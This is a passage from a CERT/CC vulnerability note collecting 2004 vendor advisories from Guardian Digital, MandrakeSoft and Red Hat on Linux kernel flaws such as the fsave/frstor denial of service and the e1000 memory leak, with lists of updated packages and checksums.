Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23973654 Feedback>).\n\n### __ __ Guardian Digital Inc.\n\nNotified: June 15, 2004 Updated: August 18, 2004 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \n \n+------------------------------------------------------------------------+ \n| Guardian Digital Security Advisory June 21, 2004 | \n| <http://www.guardiandigital.com> ESA-20040621-005 | \n| | \n| Package: kernel | \n| Summary: Several vulnerabilities. | \n+------------------------------------------------------------------------+ \n \nEnGarde Secure Linux is an enterprise class Linux platform engineered \nto enable corporations to quickly and cost-effectively build a complete \nand secure Internet presence while preventing Internet threats. \n \nOVERVIEW \n- -------- \nThis update fixes several security vulnerabilities in the Linux Kernel \nshipped with EnGarde Secure Linux, most notably the \"fsave/frstor\" \nvulnerability (CAN-2004-0554) and an information leak in the e1000 \ndriver (CAN-2004-0535). \n \nGuardian Digital products affected by this issue include: \n \nEnGarde Secure Community 2 \nEnGarde Secure Professional v1.5 \n \nIt is recommended that all users apply this update as soon as possible. \n \nSOLUTION \n- -------- \nGuardian Digital Secure Network subscribers may automatically update \naffected systems by accessing their account from within the Guardian \nDigital WebTool. \n \nTo modify your GDSN account and contact preferences, please go to: \n \n<https://www.guardiandigital.com/account/> \n \nREFERENCES \n- ---------- \nGuardian Digital's public key: \n<http://ftp.engardelinux.org/pub/engarde/ENGARDE-GPG-KEY> \n \nOfficial Web Site of the Linux Kernel: \n<http://www.kernel.org/> \n \nGuardian Digital Advisories: \n<http://infocenter.guardiandigital.com/advisories/> \n \nSecurity Contact: security@guardiandigital.com \n \n- -------------------------------------------------------------------------- \nAuthor: Ryan W. Maple <ryan@guardiandigital.com> \nCopyright 2004, Guardian Digital, Inc. \n \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.2.2 (GNU/Linux) \n \niD8DBQFA1xEMHD5cqd57fu0RAimkAJ91QQbdq0KTPMApdbuBk0W4VaHQUQCfXTgV \nCEwu6/nwrjKh4msuRNWV4g0= \n=plmV \n-----END PGP SIGNATURE-----`\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23973654 Feedback>).\n\n### __ __ MandrakeSoft\n\nNotified: June 15, 2004 Updated: August 18, 2004 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \n_______________________________________________________________________ \n \nMandrakelinux Security Update Advisory \n_______________________________________________________________________ \n \nPackage name: kernel \nAdvisory ID: MDKSA-2004:062 \nDate: June 23rd, 2004 \n \nAffected versions: 10.0, 9.1, 9.2, Corporate Server 2.1, \nMulti Network Firewall 8.2 \n______________________________________________________________________ \n \nProblem Description: \n \nA vulnerability in the e1000 driver for the Linux kernel 2.4.26 and \nearlier was discovered by Chris Wright. The e1000 driver does not \nproperly reset memory or restrict the maximum length of a data \nstructure, which can allow a local user to read portions of kernel \nmemory (CAN-2004-0535). \n \nA vulnerability was also discovered in the kernel were a certain C \nprogram would trigger a floating point exception that would crash the \nkernel. This vulnerability can only be triggered locally by users with \nshell access (CAN-2004-0554). \n_______________________________________________________________________ \n \nReferences: \n \n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0535> \n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0554> \n<http://www.kb.cert.org/vuls/id/973654> \n______________________________________________________________________ \n \nUpdated Packages: \n \nMandrakelinux 10.0: \n4d206822c79940210133a7480d21e3df 10.0/RPMS/kernel-2.4.25.6mdk-1-1mdk.i586.rpm \n68bcd25169105b157075c49ae1afc652 10.0/RPMS/kernel-2.6.3.14mdk-1-1mdk.i586.rpm \nabf8ad1259bf4f92a49e36dfcf3c9c39 10.0/RPMS/kernel-enterprise-2.4.25.6mdk-1-1mdk.i586.rpm \n312e78a0c775dbb7b9cbef0d99a04fcd 10.0/RPMS/kernel-enterprise-2.6.3.14mdk-1-1mdk.i586.rpm \ne488a38369863ce174eedaf556cb3b89 10.0/RPMS/kernel-i686-up-4GB-2.4.25.6mdk-1-1mdk.i586.rpm \n4793fe40b2af0fdd5864f72db0615e50 10.0/RPMS/kernel-i686-up-4GB-2.6.3.14mdk-1-1mdk.i586.rpm \n762657bdede72b9a35acb17b395ee1ff 10.0/RPMS/kernel-p3-smp-64GB-2.4.25.6mdk-1-1mdk.i586.rpm \n20aef99ab5994559227cbd7010d24e3a 10.0/RPMS/kernel-p3-smp-64GB-2.6.3.14mdk-1-1mdk.i586.rpm \n08196ea86336c42d850916038a6b40ba 10.0/RPMS/kernel-secure-2.6.3.14mdk-1-1mdk.i586.rpm \n98edb621bf6194742b9f4acf41ac798a 10.0/RPMS/kernel-smp-2.4.25.6mdk-1-1mdk.i586.rpm \n97b43a5beecc427cec5339f7b230937b 10.0/RPMS/kernel-smp-2.6.3.14mdk-1-1mdk.i586.rpm \nc61995bd80f09c18d644b63574830564 10.0/RPMS/kernel-source-2.4.25-6mdk.i586.rpm \na595b55173adb08a6ee525aba7a11bcf 10.0/RPMS/kernel-source-2.6.3-14mdk.i586.rpm \n356ca3809548835c8d1543b1c5bd2c78 10.0/RPMS/kernel-source-stripped-2.6.3-14mdk.i586.rpm \n84c88cb9db5910bf541d69d041d146a2 10.0/SRPMS/kernel-2.4.25.6mdk-1-1mdk.src.rpm \n7dd3f9640e29fd2365338e6350d38ef8 10.0/SRPMS/kernel-2.6.3.14mdk-1-1mdk.src.rpm \n \nMandrakelinux 10.0/AMD64: \n0bbe2751bf80eb4cd0b62d577e580c44 amd64/10.0/RPMS/kernel-2.4.25.6mdk-1-1mdk.amd64.rpm \n2ed3cdb8d1d5a9da83e068c4be01f91f amd64/10.0/RPMS/kernel-2.6.3.14mdk-1-1mdk.amd64.rpm \naa4eee1b7d2e75100e9fac4f60484c2d amd64/10.0/RPMS/kernel-secure-2.6.3.14mdk-1-1mdk.amd64.rpm \n6c68464ee6a8f8e6abfd4aec1bc01c2a amd64/10.0/RPMS/kernel-smp-2.4.25.6mdk-1-1mdk.amd64.rpm \nacc109c127a3c52cf1d2e0f86834a62a amd64/10.0/RPMS/kernel-smp-2.6.3.14mdk-1-1mdk.amd64.rpm \nfdd0f9614d7fe27508319c021e83a41e amd64/10.0/RPMS/kernel-source-2.4.25-6mdk.amd64.rpm \ndfc6b8544787e556a30d1165cce8bfbc amd64/10.0/RPMS/kernel-source-2.6.3-14mdk.amd64.rpm \n23f827e67259b79381a9e8dd454880fa amd64/10.0/RPMS/kernel-source-stripped-2.6.3-14mdk.amd64.rpm \n84c88cb9db5910bf541d69d041d146a2 amd64/10.0/SRPMS/kernel-2.4.25.6mdk-1-1mdk.src.rpm \n7dd3f9640e29fd2365338e6350d38ef8 amd64/10.0/SRPMS/kernel-2.6.3.14mdk-1-1mdk.src.rpm \n \nCorporate Server 2.1: \n46927be757f70a59c86cdf11b3e43c92 corporate/2.1/RPMS/kernel-2.4.19.41mdk-1-1mdk.i586.rpm \nd08b40244502502acadf9ba1b0e9762b corporate/2.1/RPMS/kernel-enterprise-2.4.19.41mdk-1-1mdk.i586.rpm \n66749baa06773ce3942e2f770140502c corporate/2.1/RPMS/kernel-secure-2.4.19.41mdk-1-1mdk.i586.rpm \n32a44dfa574bbbc50d316a5c8a4ef6ba corporate/2.1/RPMS/kernel-smp-2.4.19.41mdk-1-1mdk.i586.rpm \n40213434e41fefe88d20f4231a1f9734 corporate/2.1/RPMS/kernel-source-2.4.19-41mdk.i586.rpm \n60c9941aba0d698ad72f9d2308433b1c corporate/2.1/SRPMS/kernel-2.4.19.41mdk-1-1mdk.src.rpm \n \nCorporate Server 2.1/x86_64: \ndb88d345b01e85d2c6cfb01f1e28c3f1 x86_64/corporate/2.1/RPMS/kernel-2.4.19.42mdk-1-1mdk.x86_64.rpm \neaa43fee45b287b47e59a17206040308 x86_64/corporate/2.1/RPMS/kernel-secure-2.4.19.42mdk-1-1mdk.x86_64.rpm \n88db1fa53a907a7ae59b561501053963 x86_64/corporate/2.1/RPMS/kernel-smp-2.4.19.42mdk-1-1mdk.x86_64.rpm \na63ab72190d8214f8e242fe298c49a41 x86_64/corporate/2.1/RPMS/kernel-source-2.4.19-42mdk.x86_64.rpm \nb175ee4e191ff0f4098793413dd63c71 x86_64/corporate/2.1/SRPMS/kernel-2.4.19.42mdk-1-1mdk.src.rpm \n \nMandrakelinux 9.1: \n71a8d1ae72fb050e3f4a07fcecf2f6f6 9.1/RPMS/kernel-2.4.21.0.31mdk-1-1mdk.i586.rpm \n30998cdc47a6005198d7bff758c15fa8 9.1/RPMS/kernel-enterprise-2.4.21.0.31mdk-1-1mdk.i586.rpm \n2d50a264c7578cb525ffef5b9c6c256c 9.1/RPMS/kernel-secure-2.4.21.0.31mdk-1-1mdk.i586.rpm \nd380dafaea573b0f8d135f442ac84085 9.1/RPMS/kernel-smp-2.4.21.0.31mdk-1-1mdk.i586.rpm \nfef500ffec1c0ec7e63daa040cea2d3e 9.1/RPMS/kernel-source-2.4.21-0.31mdk.i586.rpm \nf3c09dcecb57b158e7e064b58be290fc 9.1/SRPMS/kernel-2.4.21.0.31mdk-1-1mdk.src.rpm \n \nMandrakelinux 9.1/PPC: \n0ae9dba70be3135ed2d58b18744d5c88 ppc/9.1/RPMS/kernel-2.4.21.0.31mdk-1-1mdk.ppc.rpm \n32c60b01cdc16a585ddd75c00f0f1b99 ppc/9.1/RPMS/kernel-enterprise-2.4.21.0.31mdk-1-1mdk.ppc.rpm \n444be2eb864edc3e71de2a80ff1707c5 ppc/9.1/RPMS/kernel-smp-2.4.21.0.31mdk-1-1mdk.ppc.rpm \n0defa0d78d83de206b45d3e0f6f8c6b2 ppc/9.1/RPMS/kernel-source-2.4.21-0.31mdk.ppc.rpm \nf3c09dcecb57b158e7e064b58be290fc ppc/9.1/SRPMS/kernel-2.4.21.0.31mdk-1-1mdk.src.rpm \n \nMandrakelinux 9.2: \nf8d407d6b8c33d23e1869b192d86c581 9.2/RPMS/kernel-2.4.22.35mdk-1-1mdk.i586.rpm \neb13e94eb20684ac0a28d61f06f7d55b 9.2/RPMS/kernel-enterprise-2.4.22.35mdk-1-1mdk.i586.rpm \ned513e7698ee869227bb178239e4fd6b 9.2/RPMS/kernel-i686-up-4GB-2.4.22.35mdk-1-1mdk.i586.rpm \n19382a345801c54d057569d4cd238457 9.2/RPMS/kernel-p3-smp-64GB-2.4.22.35mdk-1-1mdk.i586.rpm \n1eff108d820b8eaaf4aa30dc57037e38 9.2/RPMS/kernel-secure-2.4.22.35mdk-1-1mdk.i586.rpm \n554f24dd143cef8e46db249210ee6698 9.2/RPMS/kernel-smp-2.4.22.35mdk-1-1mdk.i586.rpm \n0e4a8b55bfc63b9c69bd3ffcbf36deb3 9.2/RPMS/kernel-source-2.4.22-35mdk.i586.rpm \n9aada28aa2b9f835d3dc4cc30f856ca6 9.2/SRPMS/kernel-2.4.22.35mdk-1-1mdk.src.rpm \n \nMandrakelinux 9.2/AMD64: \n445f0184ca8c02e0a3f915408c6e8f2c amd64/9.2/RPMS/kernel-2.4.22.35mdk-1-1mdk.amd64.rpm \ndc7be7702ba82ca3e5e1c5c07ec5a7a7 amd64/9.2/RPMS/kernel-secure-2.4.22.35mdk-1-1mdk.amd64.rpm \n7249a64585c3fdb4e0c819274ffa5d6b amd64/9.2/RPMS/kernel-smp-2.4.22.35mdk-1-1mdk.amd64.rpm \n36684fff4f1d13784af9d539df01ba67 amd64/9.2/RPMS/kernel-source-2.4.22-35mdk.amd64.rpm \n9aada28aa2b9f835d3dc4cc30f856ca6 amd64/9.2/SRPMS/kernel-2.4.22.35mdk-1-1mdk.src.rpm \n \nMulti Network Firewall 8.2: \nfdd6ea13be5777eb4ac69ae4a15149eb mnf8.2/RPMS/kernel-secure-2.4.19.41mdk-1-1mdk.i586.rpm \n60c9941aba0d698ad72f9d2308433b1c mnf8.2/SRPMS/kernel-2.4.19.41mdk-1-1mdk.src.rpm \n_______________________________________________________________________ \n \nTo upgrade automatically use MandrakeUpdate or urpmi. The verification \nof md5 checksums and GPG signatures is performed automatically for you. \n \nAll packages are signed by Mandrakesoft for security. You can obtain \nthe GPG public key of the Mandrakelinux Security Team by executing: \n \ngpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 \n \nYou can view other update advisories for Mandrakelinux at: \n \n<http://www.mandrakesoft.com/security/advisories> \n \nIf you want to report vulnerabilities, please contact \n \nsecurity_linux-mandrake.com \n \nType Bits/KeyID Date User ID \npub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team \n<security linux-mandrake.com> \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.0.7 (GNU/Linux) \n \niD8DBQFA2dQumqjQ0CJFipgRAvsvAJwKYoGaMGxqb9ZWhapI96NYwd9+uQCghmDy \nOB/7YIx91p7173icwYh3Ito= \n=FVyW \n-----END PGP SIGNATURE-----`\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23973654 Feedback>).\n\n### __ __ Red Hat Inc.\n\nNotified: June 15, 2004 Updated: August 18, 2004 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n\\-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \n\\- --------------------------------------------------------------------- \nRed Hat Security Advisory \n \nSynopsis: Updated kernel packages fix security vulnerabilities \nAdvisory ID: RHSA-2004:255-01 \nIssue date: 2004-06-17 \nUpdated on: 2004-06-17 \nProduct: Red Hat Enterprise Linux \nKeywords: \nCross references: \nObsoletes: RHSA-2004:188 \nCVE Names: CAN-2004-0427 CAN-2004-0495 CAN-2004-0554 \n\\- --------------------------------------------------------------------- \n \n1\\. Topic: \n \nUpdated kernel packages for Red Hat Enterprise Linux 3 that fix security \nvulnerabilities are now available. \n \n2\\. Relevant releases/architectures: \n \nRed Hat Enterprise Linux AS version 3 - athlon, i386, i686, ia32e, ia64, ppc64, ppc64iseries, ppc64pseries, s390, s390x, x86_64 \nRed Hat Desktop version 3 - athlon, i386, i686, ia32e, x86_64 \nRed Hat Enterprise Linux ES version 3 - athlon, i386, i686, ia32e, ia64, x86_64 \nRed Hat Enterprise Linux WS version 3 - athlon, i386, i686, ia32e, ia64, x86_64 \n \n3\\. Problem description: \n \nThe Linux kernel handles the basic functions of the operating system. \n \nA flaw was found in Linux kernel versions 2.4 and 2.6 for x86 and x86_64 \nthat allowed local users to cause a denial of service (system crash) by \ntriggering a signal handler with a certain sequence of fsave and frstor \ninstructions. The Common Vulnerabilities and Exposures project \n(cve.mitre.org) has assigned the name CAN-2004-0554 to this issue. \n \nAnother flaw was discovered in an error path supporting the clone() \nsystem call that allowed local users to cause a denial of service \n(memory leak) by passing invalid arguments to clone() running in an \ninfinite loop of a user's program. The Common Vulnerabilities and \nExposures project (cve.mitre.org) has assigned the name CAN-2004-0427 \nto this issue. \n \nEnhancements were committed to the 2.6 kernel by Al Viro which enabled the \nSparse source code checking tool to check for a certain class of kernel \nbugs. A subset of these fixes also applies to various drivers in the 2.4 \nkernel. Although the majority of these resides in drivers unsupported in \nRed Hat Enterprise Linux 3, the flaws could lead to privilege escalation or \naccess to kernel memory. The Common Vulnerabilities and Exposures project \n(cve.mitre.org) has assigned the name CAN-2004-0495 to these issues. \n \nAll Red Hat Enterprise Linux 3 users are advised to upgrade their kernels \nto the packages associated with their machine architectures and \nconfigurations as listed in this erratum. These packages contain \nbackported patches to correct these issues. \n \n4\\. Solution: \n \nBefore applying this update, make sure all previously released errata \nrelevant to your system have been applied. \n \nTo update all RPMs for your particular architecture, run: \n \nrpm -Fvh [filenames] \n \nwhere [filenames] is a list of the RPMs you wish to upgrade. Only those \nRPMs which are currently installed will be updated. Those RPMs which are \nnot installed but included in the list will not be updated. Note that you \ncan also use wildcards (*.rpm) if your current directory *only* contains the \ndesired RPMs. \n \nPlease note that this update is also available via Red Hat Network. Many \npeople find this an easier way to apply updates. To use Red Hat Network, \nlaunch the Red Hat Update Agent with the following command: \n \nup2date \n \nThis will start an interactive process that will result in the appropriate \nRPMs being upgraded on your system. \n \nIf up2date fails to connect to Red Hat Network due to SSL \nCertificate Errors, you need to install a version of the \nup2date client with an updated certificate. The latest version of \nup2date is available from the Red Hat FTP site and may also be \ndownloaded directly from the RHN website: \n \n<https://rhn.redhat.com/help/latest-up2date.pxt> \n \n5\\. Bug IDs fixed (<http://bugzilla.redhat.com/bugzilla> for more info): \n \n125794 - CAN-2004-0554 local user can get the kernel to hang \n125901 - [PATCH] CAN-2004-0554: FPU exception handling local DoS \n125968 - last RH kernel affected bug \n126121 - CAN-2004-0495 Sparse security fixes backported for 2.4 kernel \n \n6\\. RPMs required: \n \nRed Hat Enterprise Linux AS version 3: \n \nSRPMS: \n<ftp://updates.redhat.com/enterprise/3AS/en/os/SRPMS/kernel-2.4.21-15.0.2.EL.src.rpm> \n\n\nathlon: \nAvailable from Red Hat Network: kernel-2.4.21-15.0.2.EL.athlon.rpm \nAvailable from Red Hat Network: kernel-smp-2.4.21-15.0.2.EL.athlon.rpm \nAvailable from Red Hat Network: kernel-smp-unsupported-2.4.21-15.0.2.EL.athlon.rpm \nAvailable from Red Hat Network: kernel-unsupported-2.4.21-15.0.2.EL.athlon.rpm \n \ni386: \nAvailable from Red Hat Network: kernel-BOOT-2.4.21-15.0.2.EL.i386.rpm \nAvailable from Red Hat Network: kernel-doc-2.4.21-15.0.2.EL.i386.rpm \nAvailable from Red Hat Network: kernel-source-2.4.21-15.0.2.EL.i386.rpm \n \ni686: \nAvailable from Red Hat Network: kernel-2.4.21-15.0.2.EL.i686.rpm \nAvailable from Red Hat Network: kernel-hugemem-2.4.21-15.0.2.EL.i686.rpm \nAvailable from Red Hat Network: kernel-hugemem-unsupported-2.4.21-15.0.2.EL.i686.rpm \nAvailable from Red Hat Network: kernel-smp-2.4.21-15.0.2.EL.i686.rpm \nAvailable from Red Hat Network: kernel-smp-unsupported-2.4.21-15.0.2.EL.i686.rpm \nAvailable from Red Hat Network: kernel-unsupported-2.4.21-15.0.2.EL.i686.rpm \n \nia32e: \nAvailable from Red Hat Network: kernel-2.4.21-15.0.2.EL.ia32e.rpm \nAvailable from Red Hat Network: kernel-unsupported-2.4.21-15.0.2.EL.ia32e.rpm \n \nia64: \nAvailable from Red Hat Network: kernel-2.4.21-15.0.2.EL.ia64.rpm \nAvailable from Red Hat Network: kernel-doc-2.4.21-15.0.2.EL.ia64.rpm \nAvailable from Red Hat Network: kernel-source-2.4.21-15.0.2.EL.ia64.rpm \nAvailable from Red Hat Network: kernel-unsupported-2.4.21-15.0.2.EL.ia64.rpm \n \nppc64: \nAvailable from Red Hat Network: kernel-doc-2.4.21-15.0.2.EL.ppc64.rpm \nAvailable from Red Hat Network: kernel-source-2.4.21-15.0.2.EL.ppc64.rpm \n \nppc64iseries: \nAvailable from Red Hat Network: kernel-2.4.21-15.0.2.EL.ppc64iseries.rpm \nAvailable from Red Hat Network: kernel-unsupported-2.4.21-15.0.2.EL.ppc64iseries.rpm \n \nppc64pseries: \nAvailable from Red Hat Network: kernel-2.4.21-15.0.2.EL.ppc64pseries.rpm \nAvailable from Red Hat Network: kernel-unsupported-2.4.21-15.0.2.EL.ppc64pseries.rpm \n \ns390: \nAvailable from Red Hat Network: kernel-2.4.21-15.0.2.EL.s390.rpm \nAvailable from Red Hat Network: kernel-doc-2.4.21-15.0.2.EL.s390.rpm \nAvailable from Red Hat Network: kernel-source-2.4.21-15.0.2.EL.s390.rpm \nAvailable from Red Hat Network: kernel-unsupported-2.4.21-15.0.2.EL.s390.rpm \n \ns390x: \nAvailable from Red Hat Network: kernel-2.4.21-15.0.2.EL.s390x.rpm \nAvailable from Red Hat Network: kernel-doc-2.4.21-15.0.2.EL.s390x.rpm \nAvailable from Red Hat Network: kernel-source-2.4.21-15.0.2.EL.s390x.rpm \nAvailable from Red Hat Network: kernel-unsupported-2.4.21-15.0.2.EL.s390x.rpm \n \nx86_64: \nAvailable from Red Hat Network: kernel-2.4.21-15.0.2.EL.x86_64.rpm \nAvailable from Red Hat Network: kernel-doc-2.4.21-15.0.2.EL.x86_64.rpm \nAvailable from Red Hat Network: kernel-smp-2.4.21-15.0.2.EL.x86_64.rpm \nAvailable from Red Hat Network: kernel-smp-unsupported-2.4.21-15.0.2.EL.x86_64.rpm \nAvailable from Red Hat Network: kernel-source-2.4.21-15.0.2.EL.x86_64.rpm \nAvailable from Red Hat Network: kernel-unsupported-2.4.21-15.0.2.EL.x86_64.rpm \n \nRed Hat Desktop version 3: \n \nSRPMS: \n<ftp://updates.redhat.com/enterprise/3desktop/en/os/SRPMS/kernel-2.4.21-15.0.2.EL.src.rpm> \n \nathlon: \nAvailable from Red Hat Network: kernel-2.4.21-15.0.2.EL.athlon.rpm \nAvailable from Red Hat Network: kernel-smp-2.4.21-15.0.2.EL.athlon.rpm \nAvailable from Red Hat Network: kernel-smp-unsupported-2.4.21-15.0.2.EL.athlon.rpm \nAvailable from Red Hat Network: kernel-unsupported-2.4.21-15.0.2.EL.athlon.rpm \n \ni386: \nAvailable from Red Hat Network: kernel-BOOT-2.4.21-15.0.2.EL.i386.rpm \nAvailable from Red Hat Network: kernel-doc-2.4.21-15.0.2.EL.i386.rpm \nAvailable from Red Hat Network: kernel-source-2.4.21-15.0.2.EL.i386.rpm \n \ni686: \nAvailable from Red Hat Network: kernel-2.4.21-15.0.2.EL.i686.rpm \nAvailable from Red Hat Network: kernel-hugemem-2.4.21-15.0.2.EL.i686.rpm \nAvailable from Red Hat Network: kernel-hugemem-unsupported-2.4.21-15.0.2.EL.i686.rpm \nAvailable from Red Hat Network: kernel-smp-2.4.21-15.0.2.EL.i686.rpm \nAvailable from Red Hat Network: kernel-smp-unsupported-2.4.21-15.0.2.EL.i686.rpm \nAvailable from Red Hat Network: kernel-unsupported-2.4.21-15.0.2.EL.i686.rpm \n \nia32e: \nAvailable from Red Hat Network: kernel-2.4.21-15.0.2.EL.ia32e.rpm \nAvailable from Red Hat Network: kernel-unsupported-2.4.21-15.0.2.EL.ia32e.rpm \n \nx86_64: \nAvailable from Red Hat Network: kernel-2.4.21-15.0.2.EL.x86_64.rpm \nAvailable from Red Hat Network: kernel-doc-2.4.21-15.0.2.EL.x86_64.rpm \nAvailable from Red Hat Network: kernel-smp-2.4.21-15.0.2.EL.x86_64.rpm \nAvailable from Red Hat Network: kernel-smp-unsupported-2.4.21-15.0.2.EL.x86_64.rpm \nAvailable from Red Hat Network: kernel-source-2.4.21-15.0.2.EL.x86_64.rpm \nAvailable from Red Hat Network: kernel-unsupported-2.4.21-15.0.2.EL.x86_64.rpm \n \nRed Hat Enterprise Linux ES version 3: \n \nSRPMS: \n<ftp://updates.redhat.com/enterprise/3ES/en/os/SRPMS/kernel-2.4.21-15.0.2.EL.src.rpm> \n \nathlon: \nAvailable from Red Hat Network: kernel-2.4.21-15.0.2.EL.athlon.rpm \nAvailable from Red Hat Network: kernel-smp-2.4.21-15.0.2.EL.athlon.rpm \nAvailable from Red Hat Network: kernel-smp-unsupported-2.4.21-15.0.2.EL.athlon.rpm \nAvailable from Red Hat Network: kernel-unsupported-2.4.21-15.0.2.EL.athlon.rpm \n \ni386: \nAvailable from Red Hat Network: kernel-BOOT-2.4.21-15.0.2.EL.i386.rpm \nAvailable from Red Hat Network: kernel-doc-2.4.21-15.0.2.EL.i386.rpm \nAvailable from Red Hat Network: kernel-source-2.4.21-15.0.2.EL.i386.rpm \n \ni686: \nAvailable from Red Hat Network: kernel-2.4.21-15.0.2.EL.i686.rpm \nAvailable from Red Hat Network: kernel-hugemem-2.4.21-15.0.2.EL.i686.rpm \nAvailable from Red Hat Network: kernel-hugemem-unsupported-2.4.21-15.0.2.EL.i686.rpm \nAvailable from Red Hat Network: kernel-smp-2.4.21-15.0.2.EL.i686.rpm \nAvailable from Red Hat Network: kernel-smp-unsupported-2.4.21-15.0.2.EL.i686.rpm \nAvailable from Red Hat Network: kernel-unsupported-2.4.21-15.0.2.EL.i686.rpm \n \nia32e: \nAvailable from Red Hat Network: kernel-2.4.21-15.0.2.EL.ia32e.rpm \nAvailable from Red Hat Network: kernel-unsupported-2.4.21-15.0.2.EL.ia32e.rpm \n \nia64: \nAvailable from Red Hat Network: kernel-2.4.21-15.0.2.EL.ia64.rpm \nAvailable from Red Hat Network: kernel-doc-2.4.21-15.0.2.EL.ia64.rpm \nAvailable from Red Hat Network: kernel-source-2.4.21-15.0.2.EL.ia64.rpm \nAvailable from Red Hat Network: kernel-unsupported-2.4.21-15.0.2.EL.ia64.rpm \n \nx86_64: \nAvailable from Red Hat Network: kernel-2.4.21-15.0.2.EL.x86_64.rpm \nAvailable from Red Hat Network: kernel-doc-2.4.21-15.0.2.EL.x86_64.rpm \nAvailable from Red Hat Network: kernel-smp-2.4.21-15.0.2.EL.x86_64.rpm \nAvailable from Red Hat Network: kernel-smp-unsupported-2.4.21-15.0.2.EL.x86_64.rpm \nAvailable from Red Hat Network: kernel-source-2.4.21-15.0.2.EL.x86_64.rpm \nAvailable from Red Hat Network: kernel-unsupported-2.4.21-15.0.2.EL.x86_64.rpm \n \nRed Hat Enterprise Linux WS version 3: \n \nSRPMS: \n<ftp://updates.redhat.com/enterprise/3WS/en/os/SRPMS/kernel-2.4.21-15.0.2.EL.src.rpm> \n \nathlon: \nAvailable from Red Hat Network: kernel-2.4.21-15.0.2.EL.athlon.rpm \nAvailable from Red Hat Network: kernel-smp-2.4.21-15.0.2.EL.athlon.rpm \nAvailable from Red Hat Network: kernel-smp-unsupported-2.4.21-15.0.2.EL.athlon.rpm \nAvailable from Red Hat Network: kernel-unsupported-2.4.21-15.0.2.EL.athlon.rpm \n \ni386: \nAvailable from Red Hat Network: kernel-BOOT-2.4.21-15.0.2.EL.i386.rpm \nAvailable from Red Hat Network: kernel-doc-2.4.21-15.0.2.EL.i386.rpm \nAvailable from Red Hat Network: kernel-source-2.4.21-15.0.2.EL.i386.rpm \n \ni686: \nAvailable from Red Hat Network: kernel-2.4.21-15.0.2.EL.i686.rpm \nAvailable from Red Hat Network: kernel-hugemem-2.4.21-15.0.2.EL.i686.rpm \nAvailable from Red Hat Network: kernel-hugemem-unsupported-2.4.21-15.0.2.EL.i686.rpm \nAvailable from Red Hat Network: kernel-smp-2.4.21-15.0.2.EL.i686.rpm \nAvailable from Red Hat Network: kernel-smp-unsupported-2.4.21-15.0.2.EL.i686.rpm \nAvailable from Red Hat Network: kernel-unsupported-2.4.21-15.0.2.EL.i686.rpm \n \nia32e: \nAvailable from Red Hat Network: kernel-2.4.21-15.0.2.EL.ia32e.rpm \nAvailable from Red Hat Network: kernel-unsupported-2.4.21-15.0.2.EL.ia32e.rpm \n \nia64: \nAvailable from Red Hat Network: kernel-2.4.21-15.0.2.EL.ia64.rpm \nAvailable from Red Hat Network: kernel-doc-2.4.21-15.0.2.EL.ia64.rpm \nAvailable from Red Hat Network: kernel-source-2.4.21-15.0.2.EL.ia64.rpm \nAvailable from Red Hat Network: kernel-unsupported-2.4.21-15.0.2.EL.ia64.rpm \n \nx86_64: \nAvailable from Red Hat Network: kernel-2.4.21-15.0.2.EL.x86_64.rpm \nAvailable from Red Hat Network: kernel-doc-2.4.21-15.0.2.EL.x86_64.rpm \nAvailable from Red Hat Network: kernel-smp-2.4.21-15.0.2.EL.x86_64.rpm \nAvailable from Red Hat Network: kernel-smp-unsupported-2.4.21-15.0.2.EL.x86_64.rpm \nAvailable from Red Hat Network: kernel-source-2.4.21-15.0.2.EL.x86_64.rpm \nAvailable from Red Hat Network: kernel-unsupported-2.4.21-15.0.2.EL.x86_64.rpm \n \n \n \n7\\. Verification: \n \nMD5 sum Package Name \n\\- -------------------------------------------------------------------------- \n05b0bcb454ac5454479481d0288fbf20 kernel-2.4.21-15.0.2.EL.athlon.rpm \na3073219b60cbb7ce447a22e5103e097 kernel-2.4.21-15.0.2.EL.i686.rpm \n90dabcf0bb591756e5f04f397cf8a156 kernel-2.4.21-15.0.2.EL.ia32e.rpm \n24ddfb9f957028d3bbc5cfff2b25bc67 kernel-2.4.21-15.0.2.EL.ia64.rpm \n495a1c8f85e0e237643fd2e3f89ddaed kernel-2.4.21-15.0.2.EL.ppc64iseries.rpm \n6ad188ae0c61a077dede364c59448f61 kernel-2.4.21-15.0.2.EL.ppc64pseries.rpm \n1b9d329e2b074616239a91fd967871c8 kernel-2.4.21-15.0.2.EL.s390.rpm \na8bab06e561ac8b6ab473b4e722a570b kernel-2.4.21-15.0.2.EL.s390x.rpm \n669d77609b1c47ff49c939c1ea7bbc45 kernel-2.4.21-15.0.2.EL.src.rpm \n13aabc1c96dfee65f73246051a955ba8 kernel-2.4.21-15.0.2.EL.x86_64.rpm \n4635f8c6555f3b3e52feb9444b2e230d kernel-BOOT-2.4.21-15.0.2.EL.i386.rpm \n6cf6c39a83dfe7cca9c9a79f02dc3fa8 kernel-doc-2.4.21-15.0.2.EL.i386.rpm \ncc60f06bdd3ad6a05040df8ba40d41a1 kernel-doc-2.4.21-15.0.2.EL.ia64.rpm \n3f21dd578af78ed576c7cbf6e17a3f16 kernel-doc-2.4.21-15.0.2.EL.ppc64.rpm \n5e27cc65020dbb1c92368e79c3edcbe6 